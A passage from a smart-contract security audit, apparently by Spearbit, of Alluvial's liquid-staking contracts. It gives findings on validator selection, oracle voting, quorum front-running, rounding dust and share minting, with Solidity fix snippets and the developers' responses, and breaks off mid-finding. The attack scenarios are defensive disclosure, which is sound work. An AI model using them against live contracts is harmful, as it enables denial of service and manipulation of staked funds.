Alluvial: If we change the condition that checks whether the old underlying asset balance is zero to checking whether the total shares are under a minimum amount (so we would mint 1:1 as long as we haven't reached that value), would it solve the issue? This minimum value can be DEPOSIT_SIZE, as the price per share should be 1:1 anyway since no revenue was generated. Spearbit: Yes, this would solve this issue. Alluvial can also, as part of an atomic deployment, send 1 wei and mint the corresponding share using a call to the internal function _mintRawShares. Also note, we should remove the check for oldTotalAssetBalance == 0, as oldTotalAssetBalance is used as the denominator for sharesToMint. There could be some edge scenarios where _totalSupply() is positive but oldTotalAssetBalance is 0. So if extra checks are introduced for _totalSupply(), we should still keep the check, or a modified version of it, for oldTotalAssetBalance. Spearbit: The PR [SPEARBIT/4] "Add a ethToDeposit storage var that accounts for incoming ETH" introduces the BalanceToDeposit storage variable. This variable basically replaces address(this).balance for River in multiple places, including the _assetBalance() function. BalanceToDeposit can only be modified when:
An allowed user deposits into River, which will increase BalanceToDeposit and also the total minted shares. 2. An entity (in later commits only the admin can call this endpoint) calls depositToConsensusLayer, which might reduce the BalanceToDeposit amount, but the net effect on _assetBalance() would be zero. That would also mean BalanceToDeposit should have been non-zero to begin with. 3. A call to setConsensusLayerData by the Oracle (originated by a call to reportConsensusLayerData by an oracle member), which will pull fees from ELFeeRecipientAddress (in later commits it will only pull fees if needed and up to a max amount) and would increase BalanceToDeposit. Note the attack in this issue works by making sure _assetBalance() is non-zero while _totalSupply() is zero. That means we cannot afford a call to end up at _onEarnings for this scheme to work, since if _totalSupply() == 0, _onEarnings would revert. That means even with a malicious group of oracle members reporting wrong data, if a call ends up at setConsensusLayerData with _validatorCount = 0 and _validatorTotalBalance > 0, _onEarnings would trip. Also if the oracle members are not malicious and just report _validatorCount = 0 and _validatorTotalBalance = 0, but an attacker force sends 1 wei to ELFeeRecipientAddress, the same thing happens again and _onEarnings would revert since no shares are minted yet. That means all the possible ways to have a net positive effect on BalanceToDeposit (and thus _assetBalance()) while keeping _totalSupply() zero are blocked. But _assetBalance() = BalanceToDeposit.get() + CLValidatorTotalBalance.get() + (DepositedValidatorCount.get() - CLValidatorCount.get()) * ConsensusLayerDepositManagerV1.DEPOSIT_SIZE, or B = D + Bv + 32 * (Cd - Cv) where: • B is _assetBalance() • D is BalanceToDeposit.get() • Bv is CLValidatorTotalBalance.get() • Cd is DepositedValidatorCount.get() • Cv is CLValidatorCount.get() Also, Cv <= Cd is an invariant. Bv and Cv are only set in setConsensusLayerData and thus can only be changed by a quorum of oracle members. Cd only increases, is only set in depositToConsensusLayer, and requires a positive D. After a call to depositToConsensusLayer, the deltas satisfy ΔD = -32 * ΔCd (so ΔB = 0). Thus, putting all this info together, all the possible points of attack to make sure B will be positive while keeping _totalSupply() zero are blocked. A note for the future: when users are able to withdraw their investment and burn their shares, if all users withdraw and, due to some rounding errors or other causes, B stays positive, then the next user to deposit and mint a share would receive zero shares. +6.1.2 Operators._hasFundableKeys returns true for operators that do not have fundable keys Severity: Critical Risk Context: Operators.sol#L149-L154 Description: Because _hasFundableKeys uses operator.stopped in the check, an operator without fundable keys can pass the check and return true. Scenario: Op1 has • keys = 10 • limit = 10 • funded = 10 • stopped = 10 This means that all the keys got funded, but also "exited". Because of how _hasFundableKeys is made, when you call _hasFundableKeys(op1) it will return true even if the operator does not have keys available to be funded. By returning true, the operator gets wrongly included in the array returned by getAllFundable. That function is critical because it is the one used by pickNextValidators, which picks the next validators to be selected and stakes delegated user ETH.
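To make the flawed check concrete, here is a minimal, self-contained Solidity sketch (illustrative only, not the audited code; the boolean expressions are the simplified forms derived in finding 6.2.3 below) evaluating Op1's values:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Illustrative sketch: a fully funded and fully exited operator still
// looks fundable when `stopped` is part of the check.
contract HasFundableKeysSketch {
    struct Operator { bool active; uint256 keys; uint256 limit; uint256 funded; uint256 stopped; }

    // Simplified flawed expression (see finding 6.2.3 below).
    function hasFundableKeysFlawed(Operator memory op) public pure returns (bool) {
        return op.active && op.limit > op.funded - op.stopped;
    }

    // Recommended expression: ignore `stopped` entirely.
    function hasFundableKeysRecommended(Operator memory op) public pure returns (bool) {
        return op.active && op.limit > op.funded;
    }

    function demo() external pure returns (bool flawed, bool recommended) {
        // Op1 from the scenario above: keys=10, limit=10, funded=10, stopped=10.
        Operator memory op1 = Operator(true, 10, 10, 10, 10);
        flawed = hasFundableKeysFlawed(op1);           // true: 10 > 10 - 10
        recommended = hasFundableKeysRecommended(op1); // false: min(limit, keys) - funded == 0
    }
}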
Because of this issue in _hasFundableKeys, the issue "OperatorsRegistry._getNextValidatorsFromActiveOperators can DOS Alluvial staking if there's an operator with funded==stopped and funded == min(limit, keys)" can also happen, DoSing the contract in a way that will always make pickNextValidators return empty. Check the Appendix for a test case to reproduce this issue. Recommendation: Alluvial should reimplement the logic of Operators._hasFundableKeys so that it returns true if and only if the operator is active and has fundable keys. The attribute stopped should not be used. Alluvial: Recommendations implemented in PR SPEARBIT/3. Spearbit: Acknowledged. +6.1.3 OperatorsRegistry._getNextValidatorsFromActiveOperators can DOS Alluvial staking if there's an operator with funded==stopped and funded == min(limit, keys) Severity: Critical Risk Context: OperatorsRegistry.1.sol#L403-L454 Description: This issue is also related to "OperatorsRegistry._getNextValidatorsFromActiveOperators should not consider stopped when picking a validator". Consider a scenario where we have: Op at index 0: name=op1, active=true, limit=10, funded=10, stopped=10, keys=10. Op at index 1: name=op2, active=true, limit=10, funded=0, stopped=0, keys=10. In this case, • Op1 got all 10 keys funded and exited. Because it has keys=10 and limit=10, it has no more keys to get funded again. • Op2 instead still has 10 approved keys to be funded. Because of how the selection of the picked validator works uint256 selectedOperatorIndex = 0; for (uint256 idx = 1; idx < operators.length;) { if ( operators[idx].funded - operators[idx].stopped < operators[selectedOperatorIndex].funded - operators[selectedOperatorIndex].stopped ) { selectedOperatorIndex = idx; } unchecked { ++idx; } } When the function finds an operator with funded == stopped it will pick that operator because 0 < operators[selectedOperatorIndex].funded - operators[selectedOperatorIndex].stopped. After the loop ends, selectedOperatorIndex will be the index of an operator that has no more validators to be funded (for this scenario). Because of this, the following code uint256 selectedOperatorAvailableKeys = Uint256Lib.min( operators[selectedOperatorIndex].keys, operators[selectedOperatorIndex].limit ) - operators[selectedOperatorIndex].funded; when executed on Op1 will set selectedOperatorAvailableKeys = 0 and, as a result, the function will execute return (new bytes[](0), new bytes[](0));. In this scenario, when stopped==funded and there are no keys available to be funded (funded == min(limit, keys)), the function will always return an empty result, breaking the pickNextValidators mechanism, which won't be able to stake users' deposited ETH anymore even if there are operators with fundable validators. Check the Appendix for a test case to reproduce this issue. Recommendation: Alluvial should • reimplement the logic of Operators._hasFundableKeys so that it selects only active operators with fundable keys, without using the stopped attribute. • reimplement the logic inside the OperatorsRegistry._getNextValidatorsFromActiveOperators loop to correctly pick the active operator with the highest number of fundable keys, without using the stopped attribute. Alluvial: Recommendation implemented in SPEARBIT/3. Spearbit: Acknowledged.
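For reference, a minimal sketch (using the scenario's values; not the audited code) tracing why the selection math above ends with empty arrays:

// op1 is selected because funded - stopped == 0 is the minimum score,
// yet min(keys, limit) - funded leaves nothing to fund.
function traceEmptySelection() internal pure returns (uint256 selectedOperatorAvailableKeys) {
    uint256 selectedKeys = 10;   // op1.keys
    uint256 selectedLimit = 10;  // op1.limit
    uint256 selectedFunded = 10; // op1.funded
    uint256 minKeysLimit = selectedKeys < selectedLimit ? selectedKeys : selectedLimit; // 10
    // 10 - 10 == 0, so the caller returns (new bytes[](0), new bytes[](0))
    // and no ETH can be staked even though op2 has 10 fundable keys
    selectedOperatorAvailableKeys = minKeysLimit - selectedFunded;
}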
6.2 High Risk +6.2.1 Oracle.removeMember could, in the same epoch, allow members to vote multiple times and other members to not vote at all Severity: High Risk Context: Oracle.1.sol#L213-L222 Description: The current implementation of removeMember introduces an exploit that allows an oracle member to vote again and again (in the same epoch), while an oracle member that has never voted is prevented from voting (in the same epoch). Because of how OracleMembers.deleteItem is implemented, it will swap the last item of the array with the one that will be deleted and pop the last element. Let's make an example: 1) At T0, m0 is added to the list of members → members[0] = m0. 2) At T1, m1 is added to the list of members → members[1] = m1. 3) At T3, m0 calls reportBeacon(...). By doing that, ReportsPositions.register(uint256(0)); will be called, registering that the member at index 0 has cast its vote. 4) At T4, the oracle admin calls removeMember(m0). This operation, as we said, will swap the member's address at the last position of the array of members with the position of the member that will be deleted, and will then pop the last position of the array. The state changes from members[0] = m0; members[1] = m1 to members[0] = m1;. At this point, the oracle member m1 will not be able to vote during this epoch, because when it calls reportBeacon(...) the function will enter the check if (ReportsPositions.get(uint256(memberIndex))) { revert AlreadyReported(_epochId, msg.sender); } This is because int256 memberIndex = OracleMembers.indexOf(msg.sender); will return 0 (the position of the m0 member that has already voted) and ReportsPositions.get(uint256(0)) will return true. At this point, if for whatever reason an admin of the contract adds the deleted oracle member again, it would be added at position 1 of the array of members, allowing the same member, which has already voted, to vote again. Note: while the scenario where a removed member can vote multiple times would involve a corrupted admin (that would re-add the same member), the second scenario, which prevents a member from voting, would be more common. Check the Appendix for a test case to reproduce this issue. Recommendation: After removing a member from OracleMembers, also remove the information relative to the removed member from both ReportsPositions and ReportsVariants. If the single removal is not possible, clear the entire state of both ReportsPositions and ReportsVariants. The consequence would be that all the active members would need to vote again for the same epoch. Alluvial: Recommendation implemented in SPEARBIT/2. Spearbit: Acknowledged. Note: After removing an oracle member, all the "valid" members that have already voted for the epoch must vote again (everything is erased). We suggest documenting this behavior to clear any confusion for active oracle members. +6.2.2 Order of calls to removeValidators can affect the resulting validator keys set Severity: High Risk Context: OperatorsRegistry.1.sol#L310 Description: If two entities A and B (which can be either the admin or the operator O with the index I) send a call to removeValidators with 2 different sets of parameters: • T1 : (I, R1) • T2 : (I, R2) then, depending on the order of transactions, the resulting set of validators for this operator might be different.
And since either party might not know a priori if any other transaction is going to be included on the blockchain after they submit their transaction, they don't have a 100 percent guarantee that their intended set of validator keys is going to be removed. This also opens an opportunity for either party to DoS the other party's transaction by frontrunning it with a call to remove enough validator keys to trigger the InvalidIndexOutOfBounds error: OperatorsRegistry.1.sol#L324-L326: if (keyIndex >= operator.keys) { revert InvalidIndexOutOfBounds(); } Recommendation: We can send a snapshot block parameter to removeValidators and compare it to a stored field for the operator, making sure there have not been any changes to the validator key set since that snapshot block. Alluvial has introduced such a mechanism for setOperatorLimits in 030b52feb5af2dd2ad23da0d512c5b0e55eb8259. A similar technique can be used here. Alluvial: Don't think this is really an issue. On a regular basis, the admin would not remove the keys but would request the Node Operator to remove the keys (because a key is unhealthy, for example). In case a Node Operator refuses to remove the key (which is unexpected, because this would be against terms and conditions), then the admin could deactivate the operator and then remove the key without being exposed to the front-run attack. This is not as sensitive as the front run we had on setOperatorLimit because in this case we are not making any keys eligible for funding. So the consequences are not this bad. Worst case, the admin deactivates the node operator and there is no issue anymore. Spearbit: We think the issue still needs to be documented, both for the admin and also for the operators, because in the scenario above both A and B can be the operator O. And O might send two transactions T1, T2 thinking T1 would be applied to the state before T2 (this might be unintentional, or intentional maybe because of something like out-of-gas issues). But it is possible that the order would be reversed and the end result would not be what the operator had expected. And if the operator does not check this, the issue can go unnoticed. +6.2.3 _hasFundableKeys marks operators that have no more fundable validators as fundable. Severity: High Risk Context: Operators.sol#L151-L152 Description: Since operator.keys >= operator.limit (based on the checks when operator.keys has been set), we can simplify _hasFundableKeys's return expression to: operator.active && operator.limit > (operator.funded - operator.stopped) Also, based on the assumption in "Non-zero operator.limit should always be greater than or equal to operator.funded", if true: operator.limit >= operator.funded This means an active operator that has at least one stopped validator would pass the test (_hasFundableKeys(operator) == true): (stopped, funded, limit, keys) = (s, F, L, K) // where s > 0 Even operators that have their funded equal to their limit: (stopped, funded, limit, keys) = (s, F, F, K) // where s > 0 although they are maxed out for further funding. For these cases _hasFundableKeys returns true. So based on these findings it would make sense to have this function return: operator.active && ( operator.limit > operator.funded ) unless some other changes are applied to OperatorsRegistry.1.sol, especially its _getNextValidatorsFromActiveOperators function.
Also, note that funded, limit, and keys are not only counters for the operator's struct; they also define ranges in ValidatorKeys for the operator (based on the way that they have been used in OperatorsRegistry.1.sol). And this is one of the main differences between these 3 fields and the stopped field. The stopped field is only used as a counter. Alluvial: Exactly! We shouldn't take stopped into account for _hasFundableKeys, but we should keep it in the optimal operator search as we want to favor operators with the lowest count of running validators. Spearbit: So basically stopped is used for off-chain bookkeeping and also for the optimal search algorithm for picking the next validators. Alluvial: Yes, currently it's more like a manual feature because exits should be rare, but it will be a core part of the process once withdrawals are here and operators will often have to exit validators for users to redeem ETH. Recommendation implemented in SPEARBIT/3. Spearbit: Acknowledged. +6.2.4 Non-zero operator.limit should always be greater than or equal to operator.funded Severity: High Risk Context: OperatorsRegistry.1.sol#L241, OperatorsRegistry.1.sol#L428-L430 Description: For the subtraction operation in OperatorsRegistry.1.sol#L428-L430 to not underflow and revert, there should be an assumption that operators[selectedOperatorIndex].limit >= operators[selectedOperatorIndex].funded Perhaps this is a general assumption, but it is not enforced when setOperatorLimits is called with a new set of limits. Recommendation: Add a check in setOperatorLimits to enforce the new limits for the operators to be either 0 or in the range [funded, keys]. If these assumptions are not correct, what would having 0 < limit < funded signify? Also, what would setting the limit to 0 when funded is positive signify? Alluvial: Implemented in SPEARBIT/3. Spearbit: Acknowledged. 6.3 Medium Risk +6.3.1 Decrementing the quorum in Oracle in some scenarios can open up a frontrunning/backrunning opportunity for some oracle members Severity: Medium Risk Context: • Oracle.1.sol#L338-L370 • Oracle.1.sol#L260 • Oracle.1.sol#L156 @ 030b52feb5af2dd2ad23da0d512c5b0e55eb8259 Description: Assume there are 2 groups of oracle members A, B who have voted for report variants Va and Vb respectively. Let's also assume the counts for these variants, Ca and Cb, are equal and are the highest variant vote counts among all possible variants. If the Oracle admin changes the quorum to a number less than or equal to Ca + 1 = Cb + 1, any oracle member can backrun this transaction by the admin to decide which report variant, Va or Vb, gets pushed to the River. This is because when a lower quorum is submitted by the admin and there exist two variants that have the highest number of votes, in the _getQuorumReport function the returned isQuorum parameter would be false since repeat == 0 is false: Oracle.1.sol#L369: return (maxval >= _quorum && repeat == 0, variants[maxind]); Note that this issue also exists in the commit hash 030b52feb5af2dd2ad23da0d512c5b0e55eb8259 and can be triggered by the admin either by calling setQuorum or addMember when the abovementioned conditions are met. Also, note that a free-agent oracle member can frontrun the admin transaction to decide the quorum earlier in the scenario above; this way _getQuorumReport would actually return that it is a quorum. Recommendation: This issue is similar to "The reportBeacon is prone to front-running attacks by oracle members".
We recommend always checking that, after the modifications are done to the set of oracle members, setting the new quorum would respect the Q > (C + 1) / 2 invariant, where Q is the quorum and C is the number of all oracle members. Note that the invariant provided here is slightly stronger than the one in issues/54, since we are assuming the last oracle member to vote can go either way and doesn't need to belong to a particular group. issues/54 could also have been worded that way, and the invariant would have been Q > (C + 1) / 2 (also note this only applies when C > 1). Alluvial: The solution provided on liquid-collective/liquid-collective-protocol#151 should be solving the issue (clearing report data whenever a member is added or removed + quorum is changed). Not sure how the new proposed quorum invariant solves the issue. Spearbit: After a quick test (located in the Appendix), we think that with your changes the contract will push to River the report of a removed member. Scenario: • member1 added: oracle.addMember(om1, 1); • member2 added: oracle.addMember(om2, 2); • member2 calls reportConsensusLayerData; _pushToRiver is not called because we have a quorum of 2. • member2 is removed because it's a malicious oracle member: oracle.removeMember(om2, 1); this action will trigger a _pushToRiver because reports are cleared at the end of _setQuorumAndClearReports. • As a consequence, the vote of a malicious oracle has triggered _pushToRiver with probably a malicious report. Alluvial: After discussing with the team, we decided to always clear the reports whenever we add a member, remove a member or change the quorum. We removed the logic that would check if a report could be forwarded to River from the _setQuorum internal method (which has been renamed to _clearReportsAndSetQuorum). So from now on we expect oracle operators to resubmit their votes whenever one of the three actions happens. Spearbit: The proposed inequality check would have solved the issue and would also have fixed: • The reportBeacon is prone to front-running attacks by oracle members But with the current implementation of • PR #151 this issue is solved, since in _setQuorum we don't check for isQuorum, and also when adding/removing an oracle member or setting the quorum we clear the oracle member reports. The acceptable range for the quorum Q is [(C + 1) / 2, C], to fix "The reportBeacon is prone to front-running attacks by oracle members". The current invariant check: (_newQuorum == 0 && memberCount > 0) || _newQuorum > memberCount can be changed to: ( memberCount > 1 && !(2 * _newQuorum > (memberCount + 1)) ) || ( memberCount > 0 && _newQuorum == 0 ) || ( memberCount < _newQuorum ) Again, if this new inequality is not going to be checked on-chain, it should be documented and also checked off-chain. Alluvial: We are fine not constraining the quorum; we added a comment about it in the natspec. Spearbit: Acknowledged.
+6.3.2 _getNextValidatorsFromActiveOperators can be tweaked to find an operator with a better validator pool Severity: Medium Risk Context: OperatorsRegistry.1.sol#L417-L420 Description: Assume for an operator: (A, B) = (funded - stopped, limit - funded) The current algorithm finds the first index in the cached operators array with the minimum value for A and tries to gather as many publicKeys and signatures from this operator's validators, up to a max of _requestedAmount. But there is also the B cap for this amount. And if B is zero, the function returns early with empty arrays, even though there could be other approved and non-funded validators from other operators. Related: "OperatorsRegistry._getNextValidatorsFromActiveOperators should not consider stopped when picking a validator", "OperatorsRegistry._getNextValidatorsFromActiveOperators can DOS Alluvial staking if there's an operator with funded==stopped and funded == min(limit, keys)", "_hasFundableKeys marks operators that have no more fundable validators as fundable." Recommendation: A better search algorithm would be to try to find an operator by minimizing A but also maximizing B. But the only linear cost function that would avoid the shortfall above is -B. If the minimum of -B over all operators is 0, then we can conclude that B == 0 and thus limit == funded for all operators, so no more approved fundable validators are left to select. Note that we can also look at non-linear cost functions or try to change the picking algorithm in a different direction. Alluvial: It's ok to pick the operator with the least running validators as the best one even if he doesn't have a lot of fundable keys. The check for fundable should be edited to not take stopped into account; that way we can be sure that the cached operator list contains operators with at least 1 fundable key and focus entirely on finding the operator with the lowest active validator count. The end goal of the system is to even out the validator count of all operators. Of course limits will be set to similar values, but new operators with low validator numbers should be prioritised to catch up with the rest of the operators. Spearbit: We can also tweak the current algorithm to not just pick the 1st found operator with the lowest number of non-stopped funded validators, but pick one amongst those that also has the highest number of approved non-funded validators. Basically, with my notations from the previous comment, among the operators with the lowest A, pick the one with the highest B. We can tweak the search algorithm to favor/pick an operator with the highest number of allowed non-funded validators amongst the operators with the lowest number of non-stopped funded validators (as a side effect, this change also has a negative net gas change on all tests, i.e. gas is saved).
uint256 selectedFunded = operators[selectedOperatorIndex].funded; uint256 currentFunded = operators[idx].funded; uint256 selectedNonStoppedFundedValidators = ( selectedFunded - operators[selectedOperatorIndex].stopped ); uint256 currentNonStoppedFundedValidators = ( currentFunded - operators[idx].stopped ); bool equalNonStoppedFundedValidators = ( currentNonStoppedFundedValidators == selectedNonStoppedFundedValidators ); bool hasLessNonStoppedFundedValidators = ( currentNonStoppedFundedValidators < selectedNonStoppedFundedValidators ); bool hasMoreAllowedNonFundedValidators = ( operators[idx].limit - currentFunded > operators[selectedOperatorIndex].limit - selectedFunded ); if ( hasLessNonStoppedFundedValidators || ( equalNonStoppedFundedValidators && hasMoreAllowedNonFundedValidators ) ) { selectedOperatorIndex = idx; } Spearbit: The picking algorithm has been changed slightly in PR SPEARBIT/3 by adding a MAX_VALIDATOR_ATTRIBUTION_PER_ROUND cap per round and keeping track of the picked number of validators for an operator. Thus the recommendation in this issue is not fully implemented, but the early-return issue has been fixed. So the new operator picking algorithm is changed to (below, the subscript f refers to funded, p to picked, s to stopped, l to limit, and a to active): o* = argmin over o in Operators of { o_f + o_p - o_s | o_a and (o_l > o_f + o_p) } And once the operator o* is selected, we pick the number of validation keys based on: min(MAX_VALIDATOR_ATTRIBUTION_PER_ROUND, o_l - (o_f + o_p)) That means for each round we pick at most MAX_VALIDATOR_ATTRIBUTION_PER_ROUND = 5 validator keys. There could also be scenarios where for each operator o_l - (o_f + o_p) = 1, which means at each round we pick exactly 1 key. Now, if count is a really big number, we might run into out-of-gas issues. One external call that triggers _pickNextValidatorsFromActiveOperators is ConsensusLayerDepositManagerV1.depositToConsensusLayer, which currently does not have any access control modifier, so anyone can call into it. But from the test files, it seems like it might be behind a firewall such that only an executor has permission to call into it. Is it true that depositToConsensusLayer will always be behind a firewall? In that case, we could move the picking/distribution algorithm off-chain and modify the signature of depositToConsensusLayer to look like: function depositToConsensusLayer( uint256[] calldata operatorIndexes, uint256[] calldata validatorCounts ) external So we provide depositToConsensusLayer with an array of operators that we want to fund and also, per operator, the number of new validator keys that we would like to fund. Note that this would also help with the out-of-gas issue mentioned before. Why is the picking/distribution algorithm currently on-chain? Is it because it is kind of transparent for the operators how their validators get picked? Alluvial: we would like to keep things that should be transparent for end users inside the contract. Knowing that the validators are properly split between all operators is important, as operator diversification is one of the advertised benefits of liquid staking. +6.3.3 Dust might be trapped in WlsETH when burning one's balance. Severity: Medium Risk Context: WLSETH.1.sol#L140 Description: It is not possible to burn the exact amount of minted/deposited lsETH back, because the _value provided to burn is in ETH.
Assume we've called mint(r, v) with our address r; then to get the v lsETH back to our address, we need to find an x where v = floor(x * S / B) and call burn(r, x) (here S represents the total shares of lsETH and B the total underlying value). It's not always possible to find the exact x, so there will always be an amount locked in this contract (v - floor(x * S / B)). These dust amounts can accumulate from different users and turn into a big number. To get the full amount back, the user needs to mint more wlsETH tokens so that we can find an exact solution to v = floor(x * S / B). The extra amount needed to get the locked-up fees back can be engineered. The same problem exists for transfer and transferFrom. Also note, if you have minted x amount of shares, balanceOf would tell you that you own b = floor(x * B / S) wlsETH. Internally, wlsETH keeps track of the shares x. So users think they can only burn the amount b; if they plug that in for _value, the number of shares burnt would be floor(floor(x * B / S) * S / B), which has even more rounding errors. wlsETH could internally track the underlying value, but then it would not appreciate in value like lsETH; it would basically be a kind of wETH. We think the issue of not being able to transfer your full amount of shares is not as serious as not being able to burn back your shares into lsETH. On the same note, we think it would be beneficial to expose the wlsETH share amount to the end user: function sharesBalanceOf(address _owner) external view returns (uint256 shares) { return BalanceOf.get(_owner); } Recommendation: Allow the burn function to use the share amount as the unit of _value instead, to avoid locking up these dust amounts. Alluvial: Recommendation implemented in PR SPEARBIT/5. Spearbit: Acknowledged. +6.3.4 BytesLib.concat can potentially return results with dirty byte paddings. Severity: Medium Risk Context: BytesLib.sol#L23 Description: concat does not clean the potential dirty bytes that might have been copied from _postBytes (nor does it clean the padding). The dirty bytes from _postBytes are carried over to the padding for tempBytes. Recommendation: Consider modifying the code to clean the byte padding or, if the gas cost is not an issue, you can replace the usage of BytesLib.concat in the codebase with bytes.concat. Alluvial: Resolved in SPEARBIT/6. Spearbit: Acknowledged. +6.3.5 The reportBeacon is prone to front-running attacks by oracle members Severity: Medium Risk Context: Oracle.1.sol#L289 Description: There could be a situation where the oracle members are segmented into 2 groups A and B, and members of group A have voted for the report variant Va and group B for Vb. Also, let's assume these two variants are 1 vote short of quorum. Then either group can try to front-run the other to push their submitted variant to River. Recommendation: Assume that • Q is the quorum • C is the total number of all oracle members • Ca is the number of oracle members who have voted for Va • Cb is the number of oracle members who have voted for Vb then in the scenario described we have: Ca = Cb = Q - 1 Since for this frontrunning race to work we need one more oracle member in each group, we would have 2Q = (Ca + 1) + (Cb + 1) <= C, which gives Q <= C / 2. So to mitigate this issue we would need to make sure Q > C / 2. This invariant can be checked every time we modify the quorum or add a new oracle member, as sketched below.
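A minimal sketch of such a check (hypothetical helper name; the inequality is the Q > C / 2 invariant derived above):

// Hypothetical guard, to be run in setQuorum and addMember: with a
// strict-majority quorum, two disjoint groups of Q - 1 voters plus one
// racing member each can no longer both exist among C members.
function _checkQuorumInvariant(uint256 _quorum, uint256 _memberCount) internal pure {
    require(2 * _quorum > _memberCount, "quorum must be a strict majority");
}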
If we look at the last oracle member to vote differently as a free agent that can vote either way (so that we don't need two members to race against each other), then, as in the issue "Decrementing the quorum in Oracle in some scenarios can open up a frontrunning/backrunning opportunity for some oracle members", a better invariant would be Q > (C + 1) / 2. Alluvial: Yes, this is a risk from the oracle that we could mitigate by having a large oracle member count + a high quorum to make collusion as hard as possible. Also, the sanity checks inside the oracle prevent very unusual updates of the validator balance sum, so even if a collusion occurs they are bound to alter the balance up to what the sanity checks are allowing them, reducing the economic incentive behind such a move (is the max allowed delta worth it if you get removed from the system afterward?) +6.3.6 Avoid multiple divisions when calculating operatorRewards Severity: Medium Risk Context: River.1.sol#L277 Description/Recommendation: In _onEarnings, we calculate the sharesToMint and operatorRewards by dividing 2 numbers. We can reduce the number of divisions to 1 and also delegate this division to _rewardOperators. This would further avoid the rounding errors that we get when we divide two numbers in the EVM. So in: uint256 globalFee = GlobalFee.get(); uint256 numerator = _amount * currentTotalSupply * globalFee; uint256 denominator = (_assetBalance() * BASE) - (_amount * globalFee); uint256 sharesToMint = denominator == 0 ? 0 : (numerator / denominator); uint256 operatorRewards = (sharesToMint * OperatorRewardsShare.get()) / BASE; uint256 mintedRewards = _rewardOperators(operatorRewards); instead of passing operatorRewards we can pass 2 values, one for the numerator and one for the denominator. This way we can avoid the extra rounding errors introduced in _rewardOperators. _rewardOperators also needs to be changed slightly to account for these 2 new values. uint256 globalFee = GlobalFee.get(); uint256 numerator = _amount * currentTotalSupply * globalFee * OperatorRewardsShare.get(); uint256 denominator = ((_assetBalance() * BASE) - (_amount * globalFee)) * BASE; uint256 mintedRewards; if(denominator != 0) { // note: this was added to avoid calling `_rewardOperators` if `denominator == 0` mintedRewards = _rewardOperators(numerator, denominator); } Without this correction, the rounding errors are in favor of the general users/stakers and the treasury of the River protocol (not the operators). Alluvial: The whole operator rewarding system has been removed in SPEARBIT/8. Spearbit: Acknowledged. +6.3.7 Shares distributed to operators suffer from rounding error Severity: Medium Risk Context: River.1.sol#L238 Description: _rewardOperators distributes a portion of the overall shares to operators based on the number of active and funded validators that each operator has. The current number of shares distributed to each operator is calculated by the following code _mintRawShares(operators[idx].feeRecipient, validatorCounts[idx] * rewardsPerActiveValidator); where rewardsPerActiveValidator is calculated as uint256 rewardsPerActiveValidator = _reward / totalActiveValidators; This means that in reality each operator receives validatorCounts[idx] * (_reward / totalActiveValidators) shares. Such share calculation suffers from a rounding error caused by division before multiplication.
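As a worked example (illustrative numbers, not from the report), take _reward = 10 shares, totalActiveValidators = 4 and validatorCounts = [3, 1]:

function roundingDemo() internal pure returns (uint256 lostBefore, uint256 lostAfter) {
    uint256 reward = 10;
    uint256 totalActiveValidators = 4;
    uint256[2] memory validatorCounts = [uint256(3), 1];
    // division before multiplication (current): 10 / 4 = 2 per validator
    uint256 perValidator = reward / totalActiveValidators;
    lostBefore = reward - (validatorCounts[0] * perValidator + validatorCounts[1] * perValidator); // 10 - 8 = 2
    // multiplication before division (recommended): (3 * 10) / 4 = 7 and (1 * 10) / 4 = 2
    uint256 distributed = (validatorCounts[0] * reward) / totalActiveValidators
        + (validatorCounts[1] * reward) / totalActiveValidators;
    lostAfter = reward - distributed; // 10 - 9 = 1
}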
Recommendation: Consider re-writing the number of shares distributed to each operator: // removed ---> uint256 rewardsPerActiveValidator = _reward / totalActiveValidators; for (uint256 idx = 0; idx < validatorCounts.length;) { _mintRawShares( operators[idx].feeRecipient, (validatorCounts[idx] * _reward) / totalActiveValidators ); ... Note that this will reduce the rounding error, but it adds 1 DIV gas cost (5 gas) per iteration. Also, the rounding errors favor the users/depositors. Alluvial: The whole operator rewarding system has been removed in SPEARBIT/8. Spearbit: Acknowledged. +6.3.8 OperatorsRegistry._getNextValidatorsFromActiveOperators should not consider stopped when picking a validator Severity: Medium Risk Context: OperatorsRegistry.1.sol#L403-L454 Description: Note that • limit → number of validators (already pushed by the operator) that have been approved by Alluvial and can be selected to be funded. • funded → number of validators funded. • stopped → number of validators exited (validators that were funded at some point but have exited staking for any reason). The implementation of the function should favor operators that have the highest number of available validators to be funded. Nevertheless, the function favors operators whose stopped value is near their funded value. Consider the following example: Op at index 0: name=op1, active=true, limit=10, funded=5, stopped=5, keys=10. Op at index 1: name=op2, active=true, limit=10, funded=0, stopped=0, keys=10. 1) op1 and op2 have 10 validators whitelisted. 2) op1 at time1 gets 5 validators funded. 3) op1 at time2 gets those 5 validators exited, which means that op.stopped == 5. In this scenario, those 5 validators would not be used because they are "blacklisted". At this point • op1 has 5 validators that can be funded. • op2 has 10 validators that can be funded. The pickNextValidators logic should favor operators that have the highest number of available keys (not funded but approved) to be funded. If we run operatorsRegistry.pickNextValidators(5); the result is this: Op at index 0: name=op1, active=true, limit=10, funded=10, stopped=5, keys=10. Op at index 1: name=op2, active=true, limit=10, funded=0, stopped=0, keys=10. Op1 gets all its remaining 5 validators funded; the function (from the specification of the logic) should instead have picked Op2. Check the Appendix for a test case to reproduce this issue. Recommendation: Alluvial should: • reimplement the logic of Operators._hasFundableKeys so that it selects only active operators with fundable keys, without using the stopped attribute. • reimplement the logic inside the OperatorsRegistry._getNextValidatorsFromActiveOperators loop to correctly pick the active operator with the highest number of fundable keys, without using the stopped attribute. Alluvial: Recommendation implemented in SPEARBIT/3. While stopped is not used anymore to gather the list of active and fundable operators, it's still used in the sorting algorithm. As a result, it could happen that operators with stopped > 0 get picked before operators that have fundable keys but stopped == 0. Spearbit: Acknowledged. +6.3.9 approve() function can be front-run, resulting in token theft Severity: Medium Risk Context: SharesManager.1.sol#L143, WLSETH.1.sol#L116-L120 Description: The approve() function has a known race condition that can lead to token theft.
